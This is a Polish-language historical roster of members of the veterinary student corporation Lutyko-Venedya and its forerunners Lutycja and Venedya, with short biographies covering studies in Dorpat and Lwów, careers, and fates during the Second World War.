 237. Tadeusz Łożyński, (22 lipca 1910 w Śremie - 9 marca 1991 w Śremie) s. Józefa i Zofii z d. Pałkowska, absolwent Państwowego Gimnazjum im. gen. J. Wybickiego w Śremie 1920-28, odbył służbę wojskową w Szkole Podchorążych Rezerwy w Śremie 1928-29, student i absolwent AMW 1929-35, c. ok. 1930, jesienią 1935 oddelegowany przez Wojewódzkiego Lekarza Weterynarii w Poznaniu do Pudliszek dla zwalczania zarazy wśród bydła, a następnie do Sierakowa nad Wartą, gdzie otworzył prywatną praktykę weterynaryjna, prowadzoną do sierpnia 1939, ppor. rez. lekarz wet., w wojnie obronnej 1939 w 14. Dywizjonie Artylerii Ciężkiej w 14 Dywizji Piechoty, wzięty do niewoli 16 września 1939 koło miejsc. Jeziorko k. Łowicza, w niewoli w Oflagu VII A Murnau (nr 16576), po wyzwoleniu służył przy 5. Polowym Szpitalu Ewakuacyjnym w Loretto we Włoszech 1945-46, zdemobilizowany jesienią 1946, do kraju wrócił w maju 1947, kierownik Lecznicy dla Zwierząt w Sierakowie 1947-70, zastępca Powiatowego Lekarza Weterynarii w Międzychodzie 1970-75, prowadzenie nadzoru wet. nad Państwowym Stadem Ogierów w Sierakowie 1975-80, członek i długoletni prezes Towarzystwa Miłośników Ziemi Sierakowskiej, radny miejski 1961-69, aktywny członek związków kombatanckich i emerytów, w 1973 awansowany do stopnia porucznika, odznaczony Krzyżem Kawalerskim OOP, Złoty Krzyżem Zasługi, Medalem Za Udział w Wojnie Obronnej 1939, pochowany w grobowcu rodzinnym w Sierakowie

 238. Edward Łukasiewicz, (1893-1957) kurator Leopolii, dr wet. AMW 1926, oficer zawodowy, mjr WP
 239. M. [ichał] Łukasiewicz,
 240. Stanisław Wieńczysław Łukasiewicz (Łukaszewicz), (1898-1957) do 1918 student Instytutu Weterynaryjnego w Dorpacie, c. ok.1914 Venedya, sekretarz sem. let. 1917/18, potem Lutyko-Venedya, student i absolwent 1922 AMW, dr SGGW 1935, oficer zawodowy, mjr WP

  Adam Maciborko, koniec lat 20-tych (?).

 241. Adam Maciborko, sekretarz 1929/30

 242. Kazimierz Maciejewski, student UD, c. 1916 Venedya (stały gość)

  Józef Mackiewicz.

 243. Józef Mackiewicz, (27 września 1885 w Warszawie - 6 maja 1958 w Krakowie) s. Grzegorza i Scholastyki z Jamonttów, brat Witolda (Wisła), absolwent Gimnazjum w Słucku, student i absolwent 1915 Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, założyciel Venedyi 1907, w 1931 lekarz powiatowy w Wilnie, w czasie okupacji w Wilnie, a od 1941 w Krakowie, aktywny członek kościoła ewangielicko-reformowanego w Wilnie, m.in. wieloletni kurator Synodu

 244. Stanisław Majdan, (1914 - grudzień 2004) student i absolwent AMW, c. 1935, akt. 1933-39, sekretarz sem. zim. 1938/39, I wiceprezes sem. zim. 1939/40 (ostatnie Prezydium przed wojną), absolwent AMW, dr wet., po wojnie dr doc. Instytutu Weterynarii w Puławach
 245. Stanisław Majewski, (1872-1946) c. 1893 Lutycja, działacz na terenie walki z gruźlicą zwierząt
 246. Rajmund Makowski, (1884 - ) student i absolwent 1909 Instytutu Weterynaryjnego w Dorpacie, c. II sem. 1907 Venedya, w 1931 lekarz powiatowy w Kutnie
 247. Marian Maksymowicz, (14 marca 1905 - ) student i absolwent 1931 AMW, akt. 1929-31, mgr bibendi 1929, zginął w nieznanych okolicznościach
 248. Antoni Malak, (1902-1961 w Kcyni) student i absolwent 1930 AMW, akt. 1925-27
 249. Stefan Malicki, (1879 - ) student i absolwent 1903 Instytutu Weterynaryjnego w Dorpacie, c. 1898 Lutycja, w 1931 lekarz miejski w Warszawie
 250. Bronisław Malinowski, (1903 w Szumsku - ) c. 1926/27, akt. 1926/27-32
 251. Józef Malinowski, założyciel Lutycji 1884
 252. Józef Malinowski, c. 1926/27
 253. Stefan Małuszycki, c. 1893 Lutycja

  Euzebiusz Małecki, 1929 r.

 254. Euzebiusz Antoni Małecki, (29 lipca 1904 w Środzie Wielkopolskiej - 18 listopada 1955 w Szamotułach) s. Wojciecha (ziemianina, właściciela maj. Godziętowy w pow. ostrzeszowskim) i Jadwigi z d. Hentze, brat Kazimierza (Lechia), szwagier Tadeusza Łożyńskiego (Lutyko-Venedya), absolwent Gimnazjum w Środzie 1925, student i absolwent AMW 1925-31, c. 1925, akt. 1925-31, wiceprezes 1927, ukończył Szkołę Podchorążych Rezerwy Kawalerii w Grudziądzu 1932, przydzielony do 17. Pułku Ułanów Wielkopolskich w Lesznie, ppor. rez. 1935, po studiach do wojny samorządowy lekarz weterynarz w Wolsztynie, w wojnie obronnej 1939 lekarz weterynarii w dowództwie 15. Pułku Ułanów Poznańskich, walczył w składzie Wielkopolskiej Brygady Kawalerii w bitwie nad Bzurą, m.in. pod Brochowem i Walewicami, wzięty do niewoli, więzień Oflagu VII B w Eichstätt, a następnie do wyzwolenia w 1945 w VIIA Murnau, wrócił do kraju w 1947, powiatowy lekarz weterynarii w Szamotułach, żonaty z Alicją z d. Łożyńską (primo voto Niemierko), ojciec Wojciecha i Jana, ojczym Macieja Niemierko, pochowany w grobowcu rodzinnym na Cmentarzu w Środzie Wielkopolskim [Źródła (poza wskazanymi poniżej spisu członków): relacja syna Jana Małeckiego oraz Jarosława Łożyńskiego]

 255. Kazimierz Marcinkiewicz, c. 1886 Lutycja
 256. Jan Marczyński, (1894-1954) powstaniec wielkopolski, student i absolwent 1920 AMW, “jeden z pierwszych Venedów we Lwowie”, w 1931 lekarz miejski w Działdowie
 257. Kazimierz Markowicz, (1881 - kwiecień 1939) student i absolwent 1907 Instytutu Weterynaryjnego w Dorpacie, c. 1903 Lutycja, w 1931 pracownik Państwowego Instytutu Naukowego Gospodarstwa Wiejskiego w Puławach, m.in. kierownik Wydziału Serologicznego, pochowany w Warszawie
 258. Teodor Matusewicz, c. II sem. 1908 Venedya

  Roman Mazur, 1928 r.

 259. Roman Mazur, (1906 w Pelpinie - ) student i absolwent 1931 AMW, c. 1926/27, akt. 1926/27-30, olderman 1929 i 1930, sekretarz Lwowskiego Koła Międzykorporacyjnego 1928/29, w czasie wojny Volksdeutsch (zob. Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Lutyko-Venedya (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 43)

 260. Janusz Wacław Mazurkiewicz, (1907 w Buczaczu - ) student i absolwent 1933 AMW, akt. 1931
 261. Bronisław Mendlowski, student AMW, akt. 1938-39
 262. Jan Metelski, (1872 - ) student i absolwent 1896 Instytutu Weterynaryjnego w Dorpacie, c. 1898/99 Lutycja, w 1931 wolnopraktykujący lekarz w Metelinie pow. Janów
 263. Zbigniew Michalski, wiceolderman 1928/29
 264. Leon Michałowski, (1861 - ) student i absolwent 1895 Instytutu Weterynaryjnego w Dorpacie, c. 1890 Lutycja, w 1931 lekarz wolnopraktykujący w Grudziądzu
 265. Tadeusz Mierzwiński, (1896-1939) student i absolwent 1927 AMW, członek Venedyi, później w Lutyko-Venedyi, akt. 1921-27, w 1931 lekarz sejmikowy w Raciążu w pow. sierpeckim
 266. Marian Mieszkowski, c. 1898/99 Lutycja

  Józef Milchert, 1931 r.

 267. Józef Milchert, (1907 w Grudziądzu - 1972 w Gdańsku) student i absolwent 1933 AMW, wiceprezes sem. let. 1930/31 i 1931

 268. Jan Millak, brat Konrada (Lutyko-Venedya), student prawa UD, c. 1908 Venedya (stały gość)

  Konrad Millak, ok. 1910 r.

 269. Konrad Millak, (15 stycznia 1886 w Warszawie - 2 stycznia 1969 w Warszawie) s. Ludwika i Augustyny z d. Kahtz, brat Jana (Lutyko-Venedya), student Instytutu Weterynarii w Warszawie 1904, uczestnik strajku szkolnego oraz akcji sabotażowej podczas strajku powszechnego, student i absolwent Instytutu Weterynarii w Dorpacie 1907-9, c. 1907 Lutycja, założyciel Venedyi 1907, autor hymnu i pieśni do barw Venedyi, od 1910 lekarz wet. w Ostrołęce, a następnie od 1911 powiatowy lekarz wet. w Kolnie, w czasie I wojny światowej w armii rosyjskiej, a następnie w Korpusie Polskim gen. Józefa Dowbor-Muśnickiego 1918, od 1918 WP, w 1924 awansowany na pułkownika, dr wet. 1921, od 1927 szef Służby Weterynaryjnej Okręgu Korpusu Warszawskiego, działacz weterynaryjny, m.in. wiceprezes i prezes Polskiego Towarzystwa Lekarzy Weterynarii, a od 1930 I wiceprezes Zarządu Głównego Zrzeszenia Lekarzy Weterynaryjnych RP, w 1930/31 organizator oraz pierwszy wiceprezes Unii Lekarzy Weterynaryjnych Słowiańskich, od 1923 red. naczelny “Wiadomości weterynaryjnych”, działacz korporacyjny, organizator i pierwszy prezes Koła Filistrów Lutyko-Venedyi 1923-35, odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA, uczestnik wojny obronnej 1939, internowany w Rumunii, później w oflagu Dössel-Dorsten, po wojnie po wojnie zastępca szefa Wydziału Służby Weterynaryjnej Ministerstwa Obrony Narodowej, zastępca prof. SGGW, odznaczony m.in. dwukrotnie Krzyżem Oficerskim OOP 1934 oraz 1946, Złotym Krzyżem Zasługi, napisał historię Lutycji i Venedyi (Zeszyt Historyczny SGGW 1965, nr 2, s. 93-118), autor wspomnień “Kwiaty dla Anny” (2003)

  vide także fotografia wizytówki korporacyjnej Konrada Millaka z obozu jenieckiego w Dössel: W kraju i na emigracji: korporacje 1939-1989

 270. Jan Mirkowski, (1882 - ) student i absolwent 1912 Instytutu Weterynaryjnego w Dorpacie, c. 1909-1917 Lutycja, w 1931 lekarz miejski w Radomiu
 271. Piotr Mironas, c. 1896 Lutycja
 272. Hipolit Mirski Światopełk, c. 1893 Lutycja
 273. Marian Misiewicz, c. 1887 Lutycja
 274. Witold Misiewicz, c. 1914-18 Venedya
 275. Edmund Misiura, student AMW, akt. 1938-39, skarbnik sem. zim. 1939/40 (ostatnie prezydium przed wojną)

  Jan Mleczko, 1929 r.

 276. Jan Mleczko, ( - ok. 1968) uczeń Gimnazjum w Rzeszowie, student AMW, c. 1929, akt. 1929-31, po wojnie lekarz weterynarii w rzeźni we Wrocławiu

 277. Zygmunt Modelski, c. 1935 Lutyko-Venedya, jako fuks przeszedł w 1935 do odnowionej Lutycji
 278. Tadeusz Moraw, (1906 we Lwowie - po 1939 (1935?) we Lwowie) akt. 1926-31, sekretarz 1927 i 1928, wiceprezes 1929, olderman 1930 i 1931, miał umrzeć na raka
 279. Stanisław Morawski, c. 1894 Lutycja
 280. Jan Mordasewicz, c. 1897 Lutycja
 281. Kazimierz Moroz, c. II sem. 1911 Venedya
 282. Zygmunt Moszczeński, student AMW, c. ok. 1930, dpl. 1935 w Szwajcarii
 283. Wacław Mościcki, c. I sem. 1914-18 Venedya
 284. Zygmunt Mościcki, c. I sem. 1914-18 Venedya
 285. Stanisław Mucha, akt. ok. 1938
 286. Tadeusz Murawski, (21 maja 1905 w miejsc. Trląg w woj. poznańskim - 1940 w Katyniu) s. Piotra i Władysławy, student i absolwent 1934 AMW, c. ok. 1930, absolwent Szkoły Podchorążych Rezerwy Artylerii 1935, ppor. rez., przydzielony do 5 Dywizjonu Artylerii Konnej, w niewoli sowieckiej, zamordowany przez NKWD
 287. Mrygoń,
 288. Roman Marian Musielak, (1907 w Żerkowie - 1946) student i absolwent 1936 AMW
 289. Bolesław Mut, (1873 - ) student i absolwent 1901 Instytutu Weterynaryjnego w Dorpacie, c. 1895 Lutycja, w 1931 lekarz miejski w Wilnie
 290. Tadeusz Nagler vel Negler, (1903 - ok. 1970 w Poznaniu) student i absolwent 1930 AMW, c. 1925, akt. 1925-30, wiceprezes 1929, wiceprezes Lwowskiego Koła Międzykorporacyjnego 1929/30, w 1931 lekarz w Rzeźni Miejskiej w Poznaniu
 291. Adam Nargiełło, c. 1889 Lutycja
 292. Alojzy Netterowicz c, 1926/27
 293. Edmund Niebyłowski, c. 1896 Lutycja
 294. Stefan Nieciecki, c. 1886 Lutycja
 295. Roman Nieć, (1912 - ) student i absolwent 1935 AMW, c. ok. 1930, więzień obozu koncentracyjnego w Auschwitz (nr obozowy 600!), po wojnie na emigracji w Stanach Zjednoczonych
 296. Marian Edmund (Marek) Niedbał, (13 maja 1913 w Toruniu - 17 maja 1972 w Szczecinie) student i absolwent 1937 AMW, prezes sem. let. 1934/35 i 1936, olderman 1937, w 1937 lekarz wet. w Grodzisku Wlkp., dr wet. 1938/39
 297. Erazm Niekraszewicz, c. 1891 Lutycja

  Czesław Niekrasz, 1902 r.

 298. Czesław Niekrasz, (1882-1919) student i absolwent 1918 Instytutu Weterynaryjnego w Dorpacie, c. 1903 Lutycja, wielokrotny olderman, ułożył księgę zwyczajów przekazaną do Lwowa, która była podstawą obyczaju korporacyjnego we Lwowie, pochowany na warszawskich Powązkach [zob. Niekrasz Czesław Piotr (1882-1919), (w:) Konrad Millak, Słownik polskich lekarzy weterynaryjnych biograficzno-bibliograficzny 1394-1918, Warszawa 1963, s. 159]

 299. Stanisław Nielubowicz, (1884 - 21 stycznia 1962) stryj Janusza (Batoria), student i absolwent 1910 Instytutu Weterynaryjnego w Dorpacie, c. 1908 Lutycja, w 1931 lekarz powiatowy w Białymstoku
 300. Mieczysław Nocuń, (1906 - ) student i absolwent 1931 AMW, c. 1926/27, akt. 1926/27-30, sekretarz 1929/30
 301. Eliasz Noniewicz, (1863-1930) założyciel Lutycji 1884, badacz nosacizny, uczestnik organizacji rewolucyjnych i więzień polityczny
 302. Witold Nowak, akt. 1925
 303. Stanisław Odyniec, c. 1894 Lutycja
 304. Wiktor Odyniec, założyciel Lutycji 1884
 305. Kazimierz Ogonowski, ze Stanisławowa, student AMW, akt. 1938-39
 306. Stanisław Olechnowicz, c. 1894 Lutycja
 307. Zygmunt Olechowicz, c. 1888 Lutycja
 308. Jan Oleszko, c. 1888 Lutycja
 309. Jan Olszewski, (1884 - ) student i absolwent 1908 Instytutu Weterynaryjnego w Dorpacie, c. 1908 Lutycja, w 1931 lekarz powiatowy w Jędrzejowie 1931
 310. Czesław Orlikowski, (18 lipca 1888 (?) w Warszawie - 1940 w Katyniu) s. Michała i Anieli z student Instytutu Weterynaryjnego w Dorpacie, c. 1909-1917 Lutycja, dpl. Warszawa 1914, uczestnik I wojny światowej i wojny polsko-rosyjskiej 1920 (od 1919 kpt), w 1931 lekarz wolnopraktykujący w Warszawie, w niewoli sowieckiej, zamordowany przez NKWD

  Konrad Osterloff, ok. 1912 r.

 311. Konrad Władysław Osterloff, (1877 w Warszawie - 10 października 1951 w Rawie Mazowieckiej) s. Fryderyka Krystiana i Julii z d. Różewicz, student i absolwent 1912 Instytutu Weterynaryjnego w Dorpacie c. II sem. 1907 Venedya, po studiach lekarz wet. w stadninie koni w Janowie Podlaskim, od 1918 do końca życia powiatowy lekarz wet. w Rawie Mazowieckiej, w 1940 odmówił podpisania volkslisty, za co Niemcy represjonowali jego synów Wiesława i Lechosława, obu osadzono w Buchenwaldzie, mieli zostać zwolnieni po interwencji matki Marii Osterloffowej, która napisała list do kancelarii Hitlera powołując się na szwedzkie pochodzenie rodziny, po wojnie nadal praktykował jako lekarz weterynarii w Rawie Mazowieckiej, pochowany na Komunalnym Cmentarzu Katolickim w Rawie Mazowieckiej przy ul. Tomaszowskiej

 312. Edmund Otto, (1881 - ) student i absolwent 1920 Instytutu Weterynaryjnego w Dorpacie, c. 1909-1917 Lutycja, w 1931 lekarz miejski w Białej
 313. Tadeusz Owczarzak, c. ok. 1930
 314. Kazimierz Ostoja-Owsiany, (29 marca 1913 w Rakowicach pow. Nowe Miasto Lubawskie - 11 kwietnia 1987 w Grudziądzu) student i absolwent AMW 1933-39, akt. 1937-39, wiceprezes 1937/38 i 1938/39, w czasie wojny rejonowy lekarz wet. w Medenicach k. Drohobycza, po wojnie kierownik Rzeźni Miejskiej w Pucku, kierownictwo PZLZ w Nowym Stawie w pow. malborskim oraz w Skórczu pow. Starogard Gdański, od 1960 naczelny lekarz Urzędu Badania Zwierząt Rzeźnych w Zakładzie Eksportu w Grudziądzu
 315. Edmund Palmowski, (17 listopada 1911 w Pobiedziskach - 17 grudnia 1998 w Poznaniu) s. Jana i Stanisławy z d. Przykuckiej, absolwent Prywatnego Gimnazjum ks. P. Piotrowskiego w Poznaniu (późniejsze im. Adama Mickiewicza), student i absolwent AMW, wiceprezes 1937, akt. 1937-39, po studiach lekarz wet. we Lwowie, a po ekspatriacji w Głuchołazach, a następnie kolejno w Poznaniu jako dyrektor rzeźni, w Centrowecie oraz w Państwowej Spółdzielni Mleczarskiej i poznańskiej telewizji
 316. Feliks Pancerzyński, c. 1885 Lutycja
 317. Witold Paszkiewicz, c. II sem. 1912 Venedya
 318. Marian Paszkowski, (1901 - ) student i absolwent 1931 AMW, akt. 1925-28, skreślony 1928, w 1931 lekarz sejmikowy w Czeladzi
 319. Józef Paszotta, (1915 - 31 marca 2003) akt. ok. 1936-39, I wiceprezes sem. zim. 1938/39, prezes sem. let. 1938/39, II wiceprezes sem. zim. 1939/40 (ostatnie Prezydium przed wojną)
 320. Czesław Pawęcki, (1883-1938) student i absolwent 1910 Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, założyciel Venedyi 1907, w 1931 lekarz miejski w Wołkowysku
 321. Edmund Pawlicki, (1905 - ) student i absolwent 1932 AMW, c. 1925, akt. 1925-27, w 1937 lekarz wet. w Krobii w pow. leszczyńskim
 322. Stanisław Pawłowski, (1913 (?) - marzec 2011) student i absolwent weterynarii AMW, akt. 1938-39, olderman sem. zim. oraz sem. let. 1938/39 (ostatnie Prezydium przed wojną), student i absolwent anglistyki UAM, pochowany na Cmentarzu Junikowskim w Poznaniu
 323. Juliusz Pączek, (1914 - ) student i absolwent AMW, c. 1936, akt. 1936-39, skarbnik sem. let. 1938/39, emerytowany oficer LWP
 324. Hipolit Perkowski, (22 stycznia 1896 w miejsc. Gromki-Brzoski w woj. białostockim - 1940 w Katyniu) s. Franciszka i Rozalii z Krajewskich, uczestnik I wojny światowej, od 1918 w WP w 8 Pułku Artylerii Piechoty, student i absolwent 1924 AMW, dr wet. 1932, oficer zawodowy, od 1927 w 1 Dywizjonie Artylerii Konnej, mjr 1939, w niewoli sowieckiej, zamordowany przez NKWD, odznaczony Srebrym Krzyżem Zasługi
 325. Marian Pernak, (1907 w Strzałkowie - 1 czerwca 1983 we Wrześni) student i absolwent 1934 AMW, akt. 1931
 326. Edmund Piasecki, pochodził z Wągrowca, student i absolwent 1933 AMW, akt. 1927-33
 327. Kazimierz Pieniążek, c. 1893 Lutycja

  Florian Pierański, 1931/32 r.

 328. Florian Pierański, (1909? w Chodeczu - 28 kwietnia 1981 we Wrześni) student i absolwent 1933 AMW, wiceprezes sem. zim. 1931/32, dr wet. 1939

 329. Ludwik Pieślak, c. 1907 Lutycja
 330. Stanisław Pietraszko, c. ok. 1930 [być może tożsamy z Włodzimierzem]

  Włodzimierz Pietraszko, 1931/32 r.

 331. Włodzimierz Tadeusz Czesław Pietraszko, (1909 - ) student i absolwent 1935 AMW, wiceprezes sem. zim. 1931/32, sekretarz 1931/32

 332. Ksawery Pietrzak, (1886 - ) student i absolwent 1908 Instytutu Weterynaryjnego w Dorpacie, c. 1907 Lutycja, akt. 1926-27, w 1931 lekarz powiatowy w Turku
 333. Stanisław Piotrowski, student agronomii, c. 1911 Venedya (stały gość)
 334. Aleksander Plater-Płochocki, c. 1894 Lutycja
 335. Stefan Płachecki, (1881 - ) student i absolwent 1911 Instytutu Weterynaryjnego w Dorpacie, c. 1909-1917 Lutycja, w 1931 lekarz powiatowy w Zamościu
 336. Stanisław Poczman, (1885 - ) student i absolwent 1910 Instytutu Weterynaryjnego w Dorpacie, c. 1909-1917 Lutycja, w 1931 lekarz powiatowy w Pułtusku
 337. Leon Podgórski, (1873 - ) student i absolwent 1895 Instytutu Weterynaryjnego w Dorpacie, c. 1890 Lutycja, w 1931 lekarz miejski w Warszawie
 338. Stefan Podlewski, c. 1885 Lutycja

  Michał Podsędkowski, 1907 r.

 339. Michał Podsędkowski, (1883 w Kijowie - 1966 w Piotrkowie Trybunalskim) s. Stanisława i Klotyldy z Kobylańskich, ojciec Bolesława (Arkonia), student i absolwent 1913 Instytutu Weterynaryjnego w Dorpacie, c. II sem. 1907 Venedya, oficer zawodowy, mjr WP, w II RP lekarz wet. w Białymstoku i Grodnie

 340. Stefan Polankiewicz, (25 maja 1899 w miejsc. Pniewo - 1940 w Charkowie) s. Józefa i Michaliny z Gąsiorowskich, uczestnik wojny 1919-21, student i absolwent 1927 AMW, akt. 1925-27, oficer zawodowy, kpt. WP, w wojnie obronnej 1939 w 22 Pułku Ułanów Kresowej Brygady Kawalerii, w niewoli sowieckiej w Starobielsku, zamordowany przez NKWD

  Kazimierz Poleszczuk, 1928 r.

 341. Kazimierz Poleszczuk, (1906 - ) student i absolwent 1931 AMW, c. 1926/27, akt. 1926/27-30, wiceprezes 1929 i 1930, skarbnik 1929/30, skarbnik Lwowskiego Koła Międzykorporacyjnego 1928/29

 342. Mieczysław Pomianowski, c. 1887 Lutycja
 343. Tadeusz Porębski, akt. 1925-26, zwolniony z Korporacji 1926
 344. Zygmunt Pręczkowski , (1881 - 1942/43) s. Ignacego i Zdzisławy z d. Gibasiewicz, brat Władysława (Sarmatia), student i absolwent 1909 Instytutu Weterynaryjnego w Dorpacie, c. II sem. 1907 Venedya, potem 1908 Lutycja, w 1931 weterynarz miejski w Warszawie, dyrektor rzeźni warszawskiej, pochowany na Cmentarzu Wolskim w Warszawie
 345. Czesław Prokopowicz, (1898-1982 w Świnoujście) student i absolwent 1926 AMW, akt. 1925-26, prezes 1925/26, wiceprezes Lwowskiego Koła Międzykorporacyjnego 1925/26, po wojnie lekarz weterynarii wolnopraktykujący w Sieradzu
 346. Franciszek Protasewicz, c. II sem. 1907 Venedya
 347. Stanisław Pruszyński, student AMW, akt. 1938-39
 348. Mikołaj Przemycki, założyciel Lutycji 1884
 349. Julian Przepiórka, c. 1926/27, akt. 1926/27-33
 350. Witold Przewoski, (1908 w Brodnicy - 1982 w Świeciu nad Wisłą) student i absolwent 1936 AMW, dr 1949
 351. Benedykt Ptoszyński, c. 1926/27
 352. Gerard Puchar (?), akt. 1925
 353. Jan Puczkowski, (1878 - ) student i absolwent 1906 Instytutu Weterynaryjnego w Dorpacie, c. 1900 Lutycja, w 1931 lekarz miejski w Lidzie
 354. Bronisław Pukiński, (1872 - ) student i absolwent 1900 Instytutu Weterynaryjnego w Dorpacie, c. 1896 Lutycja, lekarz powiatowy w Jarocinie 1931
 355. Julian Puzinowski, c. 1914-18 Venedya
 356. Aleksander Puzyna, c. 1903 Lutycja
 357. Julian Puzyna, (1890 - wrzesień 1939) student i absolwent 1913 Instytutu Weterynaryjnego w Dorpacie, członek Venedyi, w 1931 lekarz wolnopraktykujący w Strychowie pow. Kobryń, oficer rez. kawalerii, poległ w wojnie obronnej 1939
 358. Rudolf Rachwał, c. ok. 1930
 359. Antoni Raczyński, (1879 - ) student i absolwent 1904 Instytutu Weterynaryjnego w Dorpacie, c. 1902 Lutycja, w 1931 lekarz miejski w Będzinie
 360. Wiktor Rada, akt. ok. 1938
 361. Marian Radkiewicz, (1882 - ) student i absolwent 1911 Instytutu Weterynaryjnego w Dorpacie, c. II sem. 1907 Venedya, w 1931 lekarz wolnopraktykujący w Wołkowysku

  Sylwester Radomski, 1930 r.

 362. Sylwester Jan Radomski, (17 listopada 1905 w Mogilnie - 1940 w Katyniu) s. Władysława i Praksedy z d. Płoszyńska, absolwent Gimnazjum Jana Kasprowicza w Inowrocławiu, student i absolwent 1935 AMW, akt. 1927-35, po studiach lekarz wet. w Murowanej Goślinie, absolwent Szkoły Podchorążych Rezerwy Kawalerii w Grudziądzu 1933, ppor. rez., przydzielony do 9 Pułku Artylerii Ciężkiej, w wojnie obronnej 1939 w 7 Pułku Strzelców Konnych Wielkopolskich Wielkopolskiej Brygady Kawalerii w ramach Armii “Poznań”, brał udział w słynnej szarży k. Sierakowa (na płn. od Warszawy) otwierającej drogę do stolicy oraz w obronie Warszawy, w niewoli sowieckiej w obozie w Starobielsku, zamordowany przez NKWD

  Wiktor Rajszys, 1924 r.

 363. Wiktor Rajszys, (3 lutego 1904 w Wilnie - 26 lipca 1968 w Poznaniu) s. Wincentego i Konstancji z d. Meliuksztis, student i absolwent AMW 1926-31, c. 1926/27, asystent przy Katedrze Histologii i Embriologii AMW, w czasie okupacji więzień oflagu w Woldenbergu, po wojnie kierownik Laboratorium Żywnościowego Weterynaryjnego Inspektoratu Sanitarnego Miejskiego Zakładu Weterynarii w Poznaniu

  Aleksander Ratomski.

 364. Aleksander Ratomski, (17 stycznia 1908 w Klarynowie w pow. orszańskim - 18 czerwca 1965 w Czorsztynie) s. Antoniego i Antoniny z d. Domorodzka, absolwent gimnazjum w Wilnie 1927, student i absolwent 1933 AMW, akt. 1931, po studiach asystent AMW, kierownik Państwowej Weterynaryjnej Pracowni Rozpoznawczej we Lwowie 1935-39 i 1941-43, dr wet. AMW 1938, docent AMW 1940-41, lekarz mikrobiolog Weterynaryjnej Pracowni Rozpoznawczej 1943-45, po wojnie kierownik Wojewódzkiego Zakładu Higieny Weterynaryjnej w Krakowii - filii Państwowego Instytutu Naukowego Gospodarstwa Wiejskiego w Puławach 1945-51, zastępca prof. i kierownik Katedry Mikrobiologii Wydziału Weterynaryjnego Uniwersytetu i Politechniki we Wrocławiu, kierwonik Instytutu Weterynaryjnego w Puławach 1951-66, docent 1956, autor prac naukowych z zakresu diagnostyki chorób zakaźnych, członek Rady Naukowej Instytutu Weterynaryjnego w Puławach, prezes Polskiego Towarzystwa Nauk Weterynaryjnych i Polskiego Towarzystwa Epidemiologicznego, zginął podczas spływu Dunajcem, pochowany na Cmentarzu Rakowickim w Krakowie [vide szerzej Stanisław Sroka, Aleksander Ratomski (1908-1965), (w:) PSB, t. 30, Wrocław 1987]

 365. Mieczysław Reichert (Rajchert), student i absolwent 1939 (?) AMW, c. 1926/27, wiceprezes 1928 oraz prezes 1929 i 1930 Bratniej Pomocy Studentów AMW, dr wet. 1939

  Józef Reimann.

 366. Józef Reimann, (13 lutego 1905 w miejsc. Staw w pow. toruńskim - 26 października 1987 w Wąbrzeźnie) s. Franciszka i Julianny z d. Ankowskiej, brat Leona (Lutyko-Venedya), absolwent Gimnazjum w Wąbrzeźnie 1924, student i absolwent AMW 1924-30, akt. 1925-27, działacz Bratniej Pomocy Studentów AMW oraz Zrzeszenia Studentów z Kresów Zachodnich, a w latach 1927-29 prezes Zrzeszenia, po studiach lekarz wet. w Grodnicy, Lisewie oraz Grudziądzu, kierownik Samorządowej Szkoły Kucia Koni oraz wykładowca w Państwowej Średniej Szkole Hodowlano-Rolniczej w Grudziądzu, w wojnie obronnej 1939 w 16 Pułku Artylerii Lekkiej, w niewoli niemieckiej w obozie jenieckim w Murnau, po powrocie do Polski lekarz wet. w Grudziądzu i Szubinie, m.in. lekarz powiatowy w Szubinie 1947-50 i Wąbrzeźnie 1958-70, kierownik Powiatowego Inspektoratu Sanitarnego w Wąbrzeźnie 1970-77, pochowany na Cmentarzu w Wąbrzeźnie

  Leon Reimann, lata 30-te.

 367. Leon Reimann, (3 sierpnia 1912 w miejsc. Staw w pow. toruńskim - 10 czerwca 1943 w Poznaniu) s. Franciszka i Julianny z d. Ankowskiej, brat Józefa (Lutyko-Venedya), absolwent Gimnazjum Ogólnokształcącego w Wąbrzeźnie, student AMW 1933-39, absolwent Tierarztliche Fachkurse we Lwowie 1942, akt. 1934-39, asystent miejskiego lekarza wet. w Wąbrzeźnie 1939-42, za działalność w ruchu oporu skazany na śmierć (pomoc w uchylaniu się od służby w Wehrmachcie), ścięty przez Gestapo w Poznaniu, w 1945 ekshumowany i pochowany w rodzinnym grobie na Cmentarzu w Wąbrzeźnie

 368. Wiktor Rejniak, c. 1926/27
 369. Ludomir Remiszewski, (1898 - 1977 w Poznaniu) student Instytutu Weterynaryjnego w Dorpacie, student i absolwent 19j25 AMW, członek Venedyi, a następnie w Lutyko-Venedyi, prezes Bratniej Pomocy Studentów AMW 1923, w 1931 lekarz powiatowy w Międzychodzie, a w 1937 w Nowym Tomyślu
 370. Robert Renner, c. 1889 Lutycja
 371. Paweł Riedel, (1889 - ) student i absolwent 1915 Instytutu Weterynaryjnego w Dorpacie, c. 1909-1917 Lutycja, w 1931 lekarz powiatowy w Lipnie pow. Lipno
 372. Apollo Rodziewicz, c. 1895 Lutycja
 373. Zygmunt Rogiński, c. 1895 Lutycja
 374. Stanisław Romański, c. 1926/27
 375. Jan Romer, c. II sem. 1908 Venedya
 376. Kazimierz Roszak, c. ok. 1930
 377. Stanisław Roszczak, (1901 w Pogorzeli - ok. 1943 w Nałęczowie Zdroju) studia w Dorpacie od 1917, student i absolwent 1927 AMW, akt. 1924-28, prezes 1924, sekretarz Lwowskiego Koła Międzykorporacyjnego 1924/25, olderman 1925, kurator Roxolanii 1927/28, w 1931 dyrektor rzeźni w Lubawie
 378. Stanisław Rościszewski, c. 1894 Lutycja
 379. Kazimierz Rozmiłowski, (9 listopada 1918 w Sanoku - ) s. Franciszka i Marii z Ertch, absolwent Gimnazjum im. Królowej Zofii w Sanoku 1938, student AMW 1938-39, c. 1938, akt. 1938-39, bar. 1939, w czasie okupacji pracownik fizyczny w Sanoku, w Turce nad Stryjem i Dwikozach k. Sandomierza, w czasie okupacji w konspiracji w Turce nad Stryjem, uczestniczył w przerzutach na Węgry, po wojnie student i absolwent wet. UMCS 1945-, młodszy asystent UMCS, dr wet., po studiach pracownik Państwowego Zakładu Higieny (późniejszy BIOMET) w Lublinie, w ostatnich latach w BIOWECIE w Puławach
 380. Ludomir Różycki, członek Venedyi, podpisał połączenie Lutycji i Venedyi w Lutyko-Venedję
